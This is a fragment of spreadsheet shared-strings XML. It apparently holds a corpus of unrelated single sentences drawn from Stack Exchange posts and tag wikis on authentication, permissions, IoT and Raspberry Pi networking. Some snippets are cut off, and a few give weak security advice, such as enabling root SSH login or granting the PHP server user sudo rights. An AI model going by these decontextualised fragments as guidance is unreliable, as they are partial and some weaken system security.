    <t>I was searching the internet for a way to make my iPhone initiate captive network assistant, but couldn't find a way to do so on iOS 8.</t>
  </si>
  <si>
    <t>/app
RUN pip install --trusted-host pypi.python.org -r requirements.txt
EXPOSE 80
ENV NAME World
CMD ["python", "app.py"]
Running
docker build --tag=hello .</t>
  </si>
  <si>
    <t>To finally address your question: You are right, the guard-rspec notifier runs in a subprocess and this is why we have this ugly hack to share the notification settings and your notifier does not work.</t>
  </si>
  <si>
    <t>If you send a generic user-agent header, the server could not distinguish between a your tool and an regular browser.</t>
  </si>
  <si>
    <t xml:space="preserve">
should return all the interface available in your system( generally speaking), you will see eth0 which is down, to bring it up:
then you can configure eth0 either manually or using dhcp.</t>
  </si>
  <si>
    <t>If your remote web server supports HTTP Basic authentication you can pass the credentials in the URL like so:</t>
  </si>
  <si>
    <t>Upload specific token to specific hardware and send command directly from 1 device to another device.</t>
  </si>
  <si>
    <t>Use ls with the long switch (-l) to show file/folder permissions:
Try 'man ls' for more details on the ls command and some further reading for you,  chmod and or chown will also be of interest.</t>
  </si>
  <si>
    <t>There are multiple projects which demonstrate a deauthentication attack against arbitrary networks -- just make sure you run the attack only against your own network, everything else is illegal.</t>
  </si>
  <si>
    <t>I messed with my permissions of the website directory and changed it from "root" and then freaked out because root was no longer an option to get it back... then I used the following command.</t>
  </si>
  <si>
    <t>For questions concerning the validation of iOS in-app purchase receipts against Apple servers, a recommended means of app billing fraud protection.</t>
  </si>
  <si>
    <t>Control flow integrity, or CFI, is an exploit mitigation technique that prevents bugs from turning into exploits,  Microsoft calls this "Control Flow Guard" in their C++ compiler.</t>
  </si>
  <si>
    <t>Use this tag when discussing distributing Apple platform applications via the in house certificates under Apple's Enterprise Development program.</t>
  </si>
  <si>
    <t>The process starts as normal proxy - two devices connect to the same public server:
The data flows through public server.</t>
  </si>
  <si>
    <t>Gatekeeper makes it safer to download apps by protecting you from inadvertently installing malicious software on your Mac.</t>
  </si>
  <si>
    <t>Users may be shown multiple variants if they return to a website and are not successfully identified with cookies or by login information.</t>
  </si>
  <si>
    <t>Hiding files may result more user friendly behavior but it is also a method to mask viruses and other exploits.</t>
  </si>
  <si>
    <t>If the site is not a secure site (HTTPS), clear the Require server verification (https:) for all sites in this zone check box.</t>
  </si>
  <si>
    <t>Note: If a $sanitize service is unavailable and the bound value isn't explicitly trusted, you will have an exception (instead of an exploit.)</t>
  </si>
  <si>
    <t>Integrations
Analytics
Content Management
Security
Documentation:
Quick Start
Tutorials
API documentation</t>
  </si>
  <si>
    <t>OpenPGP (RFC 2440)
Cryptographic Message Syntax (CMS, RFC 3852), including streaming API.</t>
  </si>
  <si>
    <t>Further discussion on legal implications is can be found online including Wikipedia, Hacker News and Laws.com.</t>
  </si>
  <si>
    <t>The Provider implementation controls access to Addresses and Terminals by limiting the domain it presents to the application.</t>
  </si>
  <si>
    <t>Unity allows developers to wire up Interceptors to be injected at the class or method level.</t>
  </si>
  <si>
    <t>In the privileged process, you should check with maximum distrust each request whether it is safe to execute.</t>
  </si>
  <si>
    <t>Another hack solution using a stepper would be to place a mechanical block at one extremity that will prevent your mechanism from passing.</t>
  </si>
  <si>
    <t>You can learn more about IBM BlockChain and develop your own BlockChain @ https://www.ibm.com/developerworks/cloud/library/cl-ibm-blockchain-101-quick-start-guide-for-developers-bluemix-trs/index.html</t>
  </si>
  <si>
    <t>As I recall, library loading is designed to fail if the library is not explicitly whitelisted.</t>
  </si>
  <si>
    <t>If you're implementing a TCP/UDP protocol directly, or want to utilize your authentication via channels in Phoenix, Guardian is your friend.</t>
  </si>
  <si>
    <t>Finally, the Preview application can rotate, scale and covert formats, but it is not Apple-scriptable.</t>
  </si>
  <si>
    <t>Someone could potentially send malicious commands for your bot to execute on your Raspberry Pi and gain control over it!</t>
  </si>
  <si>
    <t>An Domain Controller (DC) is a Windows server which responds to security authentication requests (logging in, checking permissions, etc.)</t>
  </si>
  <si>
    <t>Unless otherwise specified, cookies can be created, read, modified and deleted both by JavaScript and from server-side through HTTP headers.</t>
  </si>
  <si>
    <t>Unless otherwise specified, cookies can be created, read, modified and deleted both by JavaScript and by server-side through HTTP headers.</t>
  </si>
  <si>
    <t>The user can derive their own DevEUI
The AppKey is an  root key specific to the end device.</t>
  </si>
  <si>
    <t>Sentinel is a framework agnostic set of interfaces with default implementations for authentication &amp; authorization.</t>
  </si>
  <si>
    <t>Before I had implemented the simpleauth package, I could just POST the data and username to the site.</t>
  </si>
  <si>
    <t>Edit:
The relevant part of the login page is</t>
  </si>
  <si>
    <t>When putting the device in AP mode, is there any way to get whatever the user typed when logging in (the WPA2 password to the  wifi, not a captive portal password) to the AP?</t>
  </si>
  <si>
    <t>I was able to resolve the majority of the issues except for the website auto-login.</t>
  </si>
  <si>
    <t>The potential for privacy concerns because of permissions to logs vs. permission on the telemetry itself is such that we didn't want to touch that.</t>
  </si>
  <si>
    <t>I don't recall if it will impact this scenario but best be on the safe side.</t>
  </si>
  <si>
    <t>Use for questions having to do with the Security Support Provider Interface (SSPI) API.</t>
  </si>
  <si>
    <t>All events are optionally logged, but you can provide your own event handlers if you wish.</t>
  </si>
  <si>
    <t>There are strict rules which must be met in order to register one of these domains.</t>
  </si>
  <si>
    <t>I'm looking to connect an Intel Galileo to Azure through The Windows 8 version for the Internet of things.</t>
  </si>
  <si>
    <t>I know in airports, for example, I've connected to their AP, and it pops up a browser window to log in on my device.</t>
  </si>
  <si>
    <t>I checked the Activity Login portal.azure.com but it seems more like a login activity log.</t>
  </si>
  <si>
    <t>You need to use sudo to run mkdir on the root folder on any linux version:
Enter the root password when sudo prompts for it.</t>
  </si>
  <si>
    <t>Run in the terminal:
You then need to enable the mcrypt extension, which can be done by some variant of:
mv -i /etc/php5/conf.d/mcrypt.ini /etc/php5/mods-available/
php5enmod mcrypt
You will then need to restart your webserver.</t>
  </si>
  <si>
    <t>Try this:
Note: I tested this under Lubuntu and was still able to log in after this and use the user interface.</t>
  </si>
  <si>
    <t>You can use the Postman Pre-request script sandbox to generate the SAS token.</t>
  </si>
  <si>
    <t>For example, send_confirmation_callback is SendConfirmationCallback in C.  This documentation on the C SDK describes SendConfirmationCallback and ReceiveMessageCallback in great detail.</t>
  </si>
  <si>
    <t>Documentation can be found at the bytestring hackage page.</t>
  </si>
  <si>
    <t>This discussion seems to suggest it can be done but the capability needs to be coded in.</t>
  </si>
  <si>
    <t>If you're using an old version, some authentication mechanism might not be supported, so you'd need to upgrade.</t>
  </si>
  <si>
    <t>See this SuperUser query for more details about the potential permissions issue.</t>
  </si>
  <si>
    <t>It's a customizable application that takes care of the signup, activation, messaging and more.</t>
  </si>
  <si>
    <t>Handle permissions beyond logged in or not.</t>
  </si>
  <si>
    <t>I suggest you research Prepared Statements, as building a query by concatenating strings is open to SQL injection attacks.</t>
  </si>
  <si>
    <t>For questions about the reCAPTCHA service, designed to protect against spam and abuse by blocking bots while allowing valid users to pass through with ease.</t>
  </si>
  <si>
    <t>My choices are split between writing a filter driver to intercept the data coming in and going out or just have a basic serial direct communication.</t>
  </si>
  <si>
    <t>Generally, read type messages, for example WM_GETTEXT, can be sent from a lower-privilege to a higher-privilege window.</t>
  </si>
  <si>
    <t>Unison works between any pair of machines connected to the internet, communicating over either a direct socket link or tunneling over an encrypted ssh connection.</t>
  </si>
  <si>
    <t>Once a beacon that advertises specific information enters that zone the rasperry Pi should send a REST request to a webservice.</t>
  </si>
  <si>
    <t>I came across this website when trying to find a reliable way to use the watchdog for preventing failures (code lock ups) and saving battery using an Arduino.</t>
  </si>
  <si>
    <t>To give a little bit more detail, I have my fingerprint scanner (GT-511C3) connected, and the library installed that will make it work.</t>
  </si>
  <si>
    <t>I am also aware that those options would be specific to the underlying library which is used for securing connections, in my case openssl.</t>
  </si>
  <si>
    <t>If possible, I'd like the authorization to be done in textual format, and suppress the web browser from opening, because that results in "stuck" code on the SSH terminal...</t>
  </si>
  <si>
    <t>what's left is the actual profile activation, in two parts: add the newly imported profile and tell the raspberry to connect to it.</t>
  </si>
  <si>
    <t>So please check which protocols be supported in your proxy server, then to use HTTP mode or configure Socks protocol for proxy to make the script works.</t>
  </si>
  <si>
    <t>The one I choose and would recommend is to use the alternative Lets Encrypt client dehydrated together with the dns-lexicon to fully automate the process of obtaining the certificates together with the Lets Encrypt dns-challenge, which was introduced somewhere in 2016.</t>
  </si>
  <si>
    <t>If it is not relevant to you, perhaps it will help some other, especially given that the default WiFiClientSecure library will soon be switched to BearSSL and no support is currently being given for the existing implementation.</t>
  </si>
  <si>
    <t>Whenever an end device joins a network via over the air activation(OAT), the AppKey is used to derive the session keys NwkSKey and AppSKey specific for that end device to encrypt and verify network communication and application data.</t>
  </si>
  <si>
    <t>A virtual private network (VPN) is a network that uses primarily public telecommunication infrastructure, such as the Internet, to provide remote offices or travelling users access to a central organizational network.</t>
  </si>
  <si>
    <t>The ACCESSKEY setting does not have to be a character in the actual link text and the link text is not modified in any way to reflect that an ACCESSKEY has been defined for the link.</t>
  </si>
  <si>
    <t>In particular, this design enables UiBinder to generate a UiRenderer implementation to assist with rendering SafeHtml, and dispatching events to methods specified by @UiHandler tags.</t>
  </si>
  <si>
    <t>Keystone makes it easy to create sophisticated web sites and apps, and comes with an auto-generated Admin UI.</t>
  </si>
  <si>
    <t>Code failing with Cryptography deprecation error
Code won't make simple connection - feel its on my local pC?</t>
  </si>
  <si>
    <t>Get it here: https://github.com/merlinthemagic/MTS
After downloading you would simply use the following code:
In terms of security it is far better than running apache as root, or the wide open sudo permissions in your question.</t>
  </si>
  <si>
    <t>CyberSource provides payment management APIs and language-specific libraries wrapping their API.</t>
  </si>
  <si>
    <t>I can't find any clear solution on how to bypass or use the proxy for iot core.</t>
  </si>
  <si>
    <t>The list of required root certificates that must be trusted to allow for server TLS certificate validation is very long.</t>
  </si>
  <si>
    <t>currently I have this streaming to my webserver that requires a login but this can be bypassed if someone enters my IP plus the port im streaming on.</t>
  </si>
  <si>
    <t>This is possible as you should have root access on any developer device, there is a walk through here explaining how to push your apk as a system app, and then you can set the time as above!</t>
  </si>
  <si>
    <t>By storing your credentials, Windows can automatically log you on to websites or other computers.</t>
  </si>
  <si>
    <t>(Wikipedia)
Rock Ridge
Adds POSIX file permissions and ownership information, symbolic links, and support for longer file names.</t>
  </si>
  <si>
    <t>I now need to have a way for users to sign-in to their Google accounts (specifically, Google Photos) on the app, so that my node.js app on the Raspberry Pi can upload photos to the a Google Photos album.</t>
  </si>
  <si>
    <t>Name
Synopsis
Description
The virsh program is the main interface for managing virsh guest domains.</t>
  </si>
  <si>
    <t>I have included the excerpt from the page that states how to run it without using sudo or being root</t>
  </si>
  <si>
    <t>This link also provides username that is different from old code samples: 
{iothubhostname}/{device_id}/api-version=2016-11-14</t>
  </si>
  <si>
    <t>Please ensure that your PHP Version on the raspberry is compied with the --with-mcrypt parameter
See also http://php.net/manual/en/mcrypt.installation.php
You need to compile PHP with the --with-mcrypt[=DIR] parameter to
  enable this extension.</t>
  </si>
  <si>
    <t>16299 shows the same behavior for me as its insider preview versions did.</t>
  </si>
  <si>
    <t>Here are some links for your reference:
Documentation on Symmetric Key
Commit in the Java SDK that added symmetric key support
You can also use X.509 certificate.</t>
  </si>
  <si>
    <t>Use case
A quick application could replace the login system of your site using the Facebook login, as you can have on StackOverflow for example.</t>
  </si>
  <si>
    <t>Note that chroot is not necessarily enough to contain a process with root privileges.</t>
  </si>
  <si>
    <t>Forms authentication, in which you create a login page and manage authentication in your application.</t>
  </si>
  <si>
    <t>I cannot even figure out where the interaction might actually be being logged so I can check where the error is.</t>
  </si>
  <si>
    <t>Check your  file to make sure it's owned by the user you're logging in as rather than root.</t>
  </si>
  <si>
    <t>This is because aws needs certain file permissions and ownership for the credentials file (which means only www-data will be able to use this login from now on.)</t>
  </si>
  <si>
    <t>This is a security update for all previous WordPress versions.</t>
  </si>
  <si>
    <t>The instruction is legitimate but Valgrind doesn't handle it,
==7730==    i.e.</t>
  </si>
  <si>
    <t>I hope you guys have any tips on how I (might) login via python :D</t>
  </si>
  <si>
    <t>If they do not work on SSH, try them directly (root login via SSH could be disabled).</t>
  </si>
  <si>
    <t>esp8266 remembers the last STA connection ssid and password and connects automatically at default.</t>
  </si>
  <si>
    <t>For more information see:
The Tampermonkey extension page.</t>
  </si>
  <si>
    <t>I would suggest this way much more than the first because it's safer.</t>
  </si>
  <si>
    <t>Tag your question with access-vba if your question involves MS Access VBA.</t>
  </si>
  <si>
    <t>Shodan API documentation is available on the Web.</t>
  </si>
  <si>
    <t>The safe function checks the condition and call the unsafe function as shown in example below for the case explained above.</t>
  </si>
  <si>
    <t>It can also store the session data in a
  database table for added security, as this permits the session ID in
  the user's cookie to be matched against the stored session ID.</t>
  </si>
  <si>
    <t>An input mask is in general a set of rules, that entered data must conform to, mainly used for the purposes of data integrity by preventing transcription errors.</t>
  </si>
  <si>
    <t>Keybase
Keybase is a tool for linking public identities to encryption keys, it also supports teams, chat, and git hosting.</t>
  </si>
  <si>
    <t>It seems it works but when I try to export a pin on my RPi I always get Permission denied:
Here the contents of that directory:
Isn't enough to get the root's privilege with sudo to write in the export file?</t>
  </si>
  <si>
    <t>I kind of understand the question above but the answer is making my head hurt - The library needs a user login with pass code and then a simple tick box to very acceptance of t's and c's.</t>
  </si>
  <si>
    <t>The most straight-forward solution is to add the PHP application server's user (e.g., ) to /etc/sudoers, which will create a privileged user.</t>
  </si>
  <si>
    <t>This tag is also used for hiding options in other graphical interfaces and generally applies to "hiding" any information.</t>
  </si>
  <si>
    <t>Applications operating under a Medium trust level have no registry access, no access to the Windows event log, and cannot use ReflectionPermission (but can use Reflection).</t>
  </si>
  <si>
    <t>This library helps you add Facebook Login and Graph API support (targeted posting, ad management, photo upload etc.)</t>
  </si>
  <si>
    <t>There are, however, several ways to enable tethering on affected devices without paying for it, including rooting Android devices or jailbreaking iOS devices and installing a tethering application on the device.</t>
  </si>
  <si>
    <t>I recently installed Arch Linux on my Raspberry Pi and, after logging in as root and creating myself a user account I tried to use the sudo command.</t>
  </si>
  <si>
    <t>The Google APIs Console is a web interface for managing and viewing traffic data, authentication, and billing information for the google-api that are used by a project.</t>
  </si>
  <si>
    <t>{Error: EACCES: permisiion denied, open '/etc/network/interfaces'
error:-13,
code:'EACCES',
syscall:'open',
path:'/etc/network/interfaces'}
I do not seem to have access, how do I get permission?</t>
  </si>
  <si>
    <t>When executed on the new one, it prompts for the root password on the Pi, but it has not done this on previous versions of the device.</t>
  </si>
  <si>
    <t>Here you have to comment ld.so.preload which will load some shared-library,which will unable login.</t>
  </si>
  <si>
    <t>check if ifconfig reports the PROMISC flag (on the interface that you use) when you run your app on pi3 
are you running as a privileged user?</t>
  </si>
  <si>
    <t>JSONLint, which validates and formats json files, is available as a browser based tool as well as a pure JavaScript version.</t>
  </si>
  <si>
    <t>Since the version 2.5, Perl Express is free software without any limitations, registration is not required.</t>
  </si>
  <si>
    <t>What would be a viable solution to locking down the microcontroller to a specific iOS device, that way other people couldn't hijack the microcontroller?</t>
  </si>
  <si>
    <t>I'm implementing a web server for access control and I need it to be encrypted (https).</t>
  </si>
  <si>
    <t>If this seems to difficult, you could implement something fairly basic (and not very secure, but better than nothing) yourself.</t>
  </si>
  <si>
    <t>WinDbg also contains extensions for .Net debugging like ".Sos", ".SosEx" and more...
OllyDbg - An assembly debugger mostly used for reverse engineering and cracking.</t>
  </si>
  <si>
    <t>Notice: Bots should not be confused with "zombie-pc", individual units of botnet.</t>
  </si>
  <si>
    <t>An advantage would be that the ESP01 firmware version would be strictly known.</t>
  </si>
  <si>
    <t>I thought you couldn't reach the Pi from the Internet anyways without modifying firewall etc.</t>
  </si>
  <si>
    <t>This script will handle multiple domains with certificates.</t>
  </si>
  <si>
    <t>You might want to consider using a DBMS that's designed to be accessed directly via the public Internet, e.g.</t>
  </si>
  <si>
    <t>Can you run systemctl start name.service without super user privileges ?</t>
  </si>
  <si>
    <t>In its current implementation, it does not handle imaging or DIMSE networking.</t>
  </si>
  <si>
    <t>SEB relies on extensions/skins to the quiz modules in Moodle and ILIAS for safe exams.</t>
  </si>
  <si>
    <t>Also supports structured logging of jetty/tomcat access logs via logback-access.</t>
  </si>
  <si>
    <t>Network team suggested to go through another proxy.</t>
  </si>
  <si>
    <t>Cloud Firestore's cache isn't automatically cleared between sessions.</t>
  </si>
  <si>
    <t>Vulnerable Extensions List
Joomla!</t>
  </si>
  <si>
    <t>The key points of the library are:
Its simple:
Basic auth options (login, logout, register, unregister).</t>
  </si>
  <si>
    <t>Are there some settings involving permissions or something of the like that would be preventing me from being able to connect to the Java server form PHP on the Pi?</t>
  </si>
  <si>
    <t>(That way the ESP8266 doesn't have to store your WiFi password and the only data can be intercepted is the data that you send directly to the device.)</t>
  </si>
  <si>
    <t>WS-Trust is a WS-* specification and OASIS standard that provides extensions to WS-Security</t>
  </si>
  <si>
    <t>I apologize in advance for the 'fix-my-codez' question, but all the questions I have read are a bit too advanced for me as they address buffer overflows, security, endian issues, error handling, malformed messages and so on, which is way beyond my needs (ability is probably more accurate).</t>
  </si>
  <si>
    <t>I think I eventually found my answers:
Yes I'm correct, up to the word size ARM v6 (or greater) can silently handle the unaligned accesses so no trap is generated and is completely transparent for the Linux kernel.</t>
  </si>
  <si>
    <t>These codes are operating system specific.</t>
  </si>
  <si>
    <t>If selenium server needs a GUI then after you start Xvfb you need to set DISPLAY and perhaps XAUTHORITY.</t>
  </si>
  <si>
    <t>You can, however, privilege one state over the other.</t>
  </si>
  <si>
    <t>The NSSlider class uses the NSSliderCell class to implement its user interface.</t>
  </si>
  <si>
    <t>This is in contrast with MAC where the same key is used to generate or verify the tag.</t>
  </si>
  <si>
    <t>token
Can you explain me where is the error??</t>
  </si>
  <si>
    <t>I'm using the Official Wifi shield on a Uno R3.</t>
  </si>
  <si>
    <t>The script sends the logon details for a webserver.</t>
  </si>
  <si>
    <t>Right now it's using FTP with a general login, but I want to personalize that too for every device.</t>
  </si>
  <si>
    <t>Is this still safe?</t>
  </si>
  <si>
    <t>Looking at this question it looks like one can use the MAC addr for security?</t>
  </si>
  <si>
    <t>Question: How can I encrypt the whole data?</t>
  </si>
  <si>
    <t>And i have to introduce some security.</t>
  </si>
  <si>
    <t>I have been told the array is invalid for C++ arduino, I am not so sure and just learning as I go.</t>
  </si>
  <si>
    <t>Could it be something related with security?</t>
  </si>
  <si>
    <t>Related post:
Is it possible to use Microsoft Kinect on Intel Galileo board?</t>
  </si>
  <si>
    <t>I'm trying to reverse engineer the password to my Raspberry Pi.</t>
  </si>
  <si>
    <t>Does the redBear BLE shield somehow prevent other codes to be passable?</t>
  </si>
  <si>
    <t>It has to be safe!</t>
  </si>
  <si>
    <t>If yes, are there any security concerns?</t>
  </si>
  <si>
    <t>I have used the password library from Arduino's website.</t>
  </si>
  <si>
    <t>Both devices are trusted.</t>
  </si>
  <si>
    <t>and is this safe?</t>
  </si>
  <si>
    <t>We can not provide ethernet or wifi at the site.</t>
  </si>
  <si>
    <t>Anticipating your questions, login and password to my home wi-fi are correct.</t>
  </si>
  <si>
    <t>Then when I click on Login, it goes to localhost/wp-admin.php instead of 192.168.1.22/wp-admin.php and I am not sure why.</t>
  </si>
  <si>
    <t>My question is why can I connect via ssh to my pi when I use the ip address but not the hostname?</t>
  </si>
  <si>
    <t>Does anybody how to configure a proxy either on windows or on linux?</t>
  </si>
  <si>
    <t>This is probably because you need superuser privileges.</t>
  </si>
  <si>
    <t>I think it's related with OAuth 2.0 json file, but not sure... and I don't know how to use it</t>
  </si>
  <si>
    <t>I figured it might have to do with Cookies or JavaScript.</t>
  </si>
  <si>
    <t>User will then be allowed to choose which network they want to connect to.</t>
  </si>
  <si>
    <t>So first its PyCrypto then Paramiko then PySFTP.</t>
  </si>
  <si>
    <t>ERROR: The certificate of bootstrap.pypa.io is not trusted.</t>
  </si>
  <si>
    <t>readLast.php
&lt;?php
 $servername = "host";
 $username = "user"; // username for your database
 $password = "password";
 $dbname = "database"; // Name of database
 $now = new DateTime();
 $CRLF = "\n\r";
 $conn = mysqli_connect("localhost", "user", "password");
 if (!$conn) {
     die('Could not connect: ' .</t>
  </si>
  <si>
    <t>I have been trying to activate bcm2835_wdt watchdog module of raspberry pi 3 for 6 hours but I couldn't.</t>
  </si>
  <si>
    <t>Could that be a (halfway viable, or at least likely) security concern?</t>
  </si>
  <si>
    <t>Is there any method to block clearing interrupt mask (is it safe ?)</t>
  </si>
  <si>
    <t>Each of them has a web application in it, also having a login page.</t>
  </si>
  <si>
    <t>I use IE at work and the work machines have to use a proxy to connect to the internet.</t>
  </si>
  <si>
    <t>So, am I safe with this code?</t>
  </si>
  <si>
    <t>So, the keys are safe.</t>
  </si>
  <si>
    <t>Login page just refreshes.</t>
  </si>
  <si>
    <t>TO 'root'@'localhost'
And how can I fix this so I do have permissions to use PhpMyAdmin?</t>
  </si>
  <si>
    <t>I have the root certificate pem file from a Linux server.</t>
  </si>
  <si>
    <t>However, I want pi user to have zero privilege.</t>
  </si>
  <si>
    <t>Nothing is being linked.</t>
  </si>
  <si>
    <t>No sensor data was transmitted or anything.</t>
  </si>
  <si>
    <t>Also user is root for both of them.</t>
  </si>
  <si>
    <t>Why am I getting this, isn't Verisign trusted?</t>
  </si>
  <si>
    <t>But still there is a chance to get access to key and get access to the code.</t>
  </si>
  <si>
    <t>Otherwise I get the error- ImportError: you must be root.</t>
  </si>
  <si>
    <t>I mean, some professional App can only scan and connect with their own specific devices, not with any other devices for smartConfig.</t>
  </si>
  <si>
    <t>There is more information about /var/lock on the FHS site.</t>
  </si>
  <si>
    <t>They need to be thread-safe.</t>
  </si>
  <si>
    <t>The web server runs as , not as root.</t>
  </si>
  <si>
    <t>From 28.1:
Voltage on any Pin   -0.5 V to Vcc+0.5V
Because the Arduinos run at 5 V, that means -0.5 to 5.5 V is safe.</t>
  </si>
  <si>
    <t>i removed the some codes related to RGBs.</t>
  </si>
  <si>
    <t>Use ethernet (or wifi) shield to connect your board to the internet.</t>
  </si>
  <si>
    <t>You can use basic access authentication.</t>
  </si>
  <si>
    <t>You will probably not have the permissions to kill them.</t>
  </si>
  <si>
    <t>I have opted for 10 milliseconds to be safe.</t>
  </si>
  <si>
    <t>I wouldn't trust it with data.</t>
  </si>
  <si>
    <t>If you need to update your firmware,
Link to Huamao's download site.</t>
  </si>
  <si>
    <t xml:space="preserve"> authentication does not work since the web server can't (and should) access your ssh keys.</t>
  </si>
  <si>
    <t>Also restart apache just to be safe.</t>
  </si>
  <si>
    <t>After that, I used WinSCP to explorer my Intel Edison files.</t>
  </si>
  <si>
    <t>Define pin and device mapping for the ATTINY.</t>
  </si>
  <si>
    <t>Authentification via OAuth is provided by a Browser Window.</t>
  </si>
  <si>
    <t>Unfortunatelly it did not work for me when I used root user.</t>
  </si>
  <si>
    <t>The root access is why the theming doesn't work.</t>
  </si>
  <si>
    <t>Are you sure your Raspberry is connected to the internet?</t>
  </si>
  <si>
    <t>safe wiring diagram</t>
  </si>
  <si>
    <t>Now some pseudocode:
I'll leave it up to you to translate it into C++.</t>
  </si>
  <si>
    <t>You expose your RPi to the web, keep a server running on it.</t>
  </si>
  <si>
    <t>This is where OP can profile different codes.</t>
  </si>
  <si>
    <t>See: https://raspberrypi.stackexchange.com/questions/48241/auto-login-in-jessie-how</t>
  </si>
  <si>
    <t>Difference between AWS IoT SDK and Eclipse Paho
Both will use MQTT / x509 certificates and MQTT_SSL_VERSION_TLS_1_2.</t>
  </si>
  <si>
    <t>It actually had to do with privileges on the networks we use here.</t>
  </si>
  <si>
    <t>Security
If you can access it publicly, others will be able to do the same.</t>
  </si>
  <si>
    <t>Remember that you will also need the BLUETOOTH_ADMIN permission.</t>
  </si>
  <si>
    <t>Why not using the wificlientsecure library?</t>
  </si>
  <si>
    <t>My devices are rooted so maybe I would be able to use it.</t>
  </si>
  <si>
    <t>No telemetry data will be logged by our system.</t>
  </si>
  <si>
    <t>There's details about the authentication piece here.</t>
  </si>
  <si>
    <t>There is some codes on this link.</t>
  </si>
  <si>
    <t>Use the sts-securitytokenservice tag instead.</t>
  </si>
  <si>
    <t>Android security related question.</t>
  </si>
  <si>
    <t>"Incognito mode" is Google's name for the Privacy mode of the Google Chrome browser.</t>
  </si>
  <si>
    <t>For questions about the use of the Google OAuth Client Library for Java.</t>
  </si>
  <si>
    <t>Ethereum is a blockchain currency (like Bitcoin) with a public ledger.</t>
  </si>
  <si>
    <t>Tag for the AppAuth library.</t>
  </si>
  <si>
    <t>Use for questions about multi-factor authentication (MFA).</t>
  </si>
  <si>
    <t>For questions pertaining to the LiquidHaskell static verifier.</t>
  </si>
  <si>
    <t>DO NOT USE this tag for Microsoft Access, use [ms-access] instead.</t>
  </si>
  <si>
    <t>This tag is for the certbot client itself.</t>
  </si>
  <si>
    <t>For discussion about the Allatori Java Obfuscator</t>
  </si>
  <si>
    <t>Neo is a blockchain currency (like Bitcoin) with a public ledger.</t>
  </si>
  <si>
    <t>Central Authentication Service, a trusted system to authenticate a user.</t>
  </si>
  <si>
    <t>Questions about the Amazon Cognito authentication using Facebook</t>
  </si>
  <si>
    <t>Please use the [authentication] tag instead.</t>
  </si>
  <si>
    <t>Twitter implementation of oauth</t>
  </si>
  <si>
    <t>Once postal codes were introduced, other applications became possible.</t>
  </si>
  <si>
    <t>Learn Cypher
Neo4j Cypher Stable Refcard
Neo4j Cypher Refcard 2.0
Neo4j Cypher Refcard 1.9</t>
  </si>
  <si>
    <t>Partial trust is part of Microsoft's Code Access Security (CAS) model introduced with .NET 2.0.</t>
  </si>
  <si>
    <t>More information
Intel MIC wikipedia page
MIC Page in Intel Webiste</t>
  </si>
  <si>
    <t>Just call SocialAuth and you can get all their profile details.</t>
  </si>
  <si>
    <t>This application allow a user to connect to you website with : 
legacy account : username/password
openid url</t>
  </si>
  <si>
    <t>Useful links:
CERTUTIL on technet.</t>
  </si>
  <si>
    <t>CERTUTIL on SS64 help pages.</t>
  </si>
  <si>
    <t>Taken from the HackageDB site</t>
  </si>
  <si>
    <t>mechanisms for key exchange
http://en.wikipedia.org/wiki/WS-Trust</t>
  </si>
  <si>
    <t>System.Web.Security.MembershipProvider
 .</t>
  </si>
  <si>
    <t>The rfc for OAuth2.0 specification can be accessed from this link.</t>
  </si>
  <si>
    <t>The devices don't have to be on the same network, but they do have to be connected to the Internet.</t>
  </si>
  <si>
    <t>Introduced under the name Passbook in iOS6, it was renamed as Wallet in iOS9.</t>
  </si>
  <si>
    <t>Openswan is an IPsec implementation for Linux.</t>
  </si>
  <si>
    <t>Fingerprintjs is deprecated and has been superseded by Fingerprintjs2.</t>
  </si>
  <si>
    <t>Metamask is a cryptocurrency wallet which can be used on the Chrome, Firefox and Brave browsers.</t>
  </si>
  <si>
    <t>Network security has also been a selling point for BlackBerry devices.</t>
  </si>
  <si>
    <t>PyCrypto and PyCryptodome can coexist.</t>
  </si>
  <si>
    <t>Use the
  tampermonkey tag if you are using Tampermonkey on Chrome.</t>
  </si>
  <si>
    <t>IP banning and user "kill" system.</t>
  </si>
  <si>
    <t>Resources
Wikipedia: BCrypt
Ruby implementation</t>
  </si>
  <si>
    <t>For Safari for iOS devices, there is the mobile-safari tag.</t>
  </si>
  <si>
    <t>The first two are safe for all JavaScript.</t>
  </si>
  <si>
    <t>This tag is for the implementation of django-graphql-jwt which is a
JSON Web Token authentication for Graphene-Django</t>
  </si>
  <si>
    <t>The TAPI was introduced by Intel and Microsoft in 1993.</t>
  </si>
  <si>
    <t>The only safe action in response to a BSOD is that you need to restart your computer.</t>
  </si>
  <si>
    <t>In Java EE 5, Interceptors were allowed only on EJBs.</t>
  </si>
  <si>
    <t>Algorithm is thread safe.</t>
  </si>
  <si>
    <t>Philosophically, AntiSamy is a departure from contemporary security mechanisms.</t>
  </si>
  <si>
    <t>Further I'm lurking around in the Charcoal chatroom to help taking down spam.</t>
  </si>
  <si>
    <t>Redbird Reverse Proxy
Handling dynamic virtual hosts, load balancing, proxying web sockets and SSL encryption should be
easy and robust.</t>
  </si>
  <si>
    <t>People use 'AutoHotKey' to make bot scripts to fire when their cursor passes over an enemy, so it might be banned outright by anti-cheat engines.</t>
  </si>
  <si>
    <t>It also aims to provide a
   secure method for non privileged users to create and mount their own filesystem
   implementations.</t>
  </si>
  <si>
    <t>Warning: SimpleHTTPServer is not the most secure web server, be careful with exposing your computer to the public this way.</t>
  </si>
  <si>
    <t>Be careful when swapping a known-good for a suspect FRU: if appropriate use anti-static precautions.</t>
  </si>
  <si>
    <t>This tag covers all kind of network scans over all interfaces such as ethernet, Wi-Fi and Bluetooth.</t>
  </si>
  <si>
    <t>In that case, you must make sure that:
The embedded device is connected to the network 
It's running a SSH daemon (likely opensshd)
It's allowing your user to connect to (typically, on default installation, root is not allowed to connect, you'll need to modify /etc/ssh/sshd_config to PermitRootLogin to yes)
(Optionally) You generate a key pair on the host (via ssh-keygen and copy the public key on your embedded user's .ssh/authorized_keys folder) to allow password-less login
Please refer to SSH man page.</t>
  </si>
  <si>
    <t>The unsafe.Pointer documentation has a fair amount to say on this topic, even with regards to less exotic syscalls.</t>
  </si>
  <si>
    <t>It can also refer to overwriting the contents of a file in an attempt to prevent recovery of deleted data.</t>
  </si>
  <si>
    <t>It allows for in-place editing of content for logged in admin-level users.</t>
  </si>
  <si>
    <t>It was created within the OpenDarwin project and is used in Mac OS X 10.5 for software installation routines, as well as browser extensions in Safari 5.0.</t>
  </si>
  <si>
    <t>In our own service I did implement the verification of the certificate chain myself, and I did need the root certificate for this.</t>
  </si>
  <si>
    <t>I suggest you to use cookies for the "user identification" where you can save a timestamp.</t>
  </si>
  <si>
    <t>As W.B suggested, you need include guard for every header file you define.</t>
  </si>
  <si>
    <t>In either case, do not forget that any traffic over the Internet is insecure.</t>
  </si>
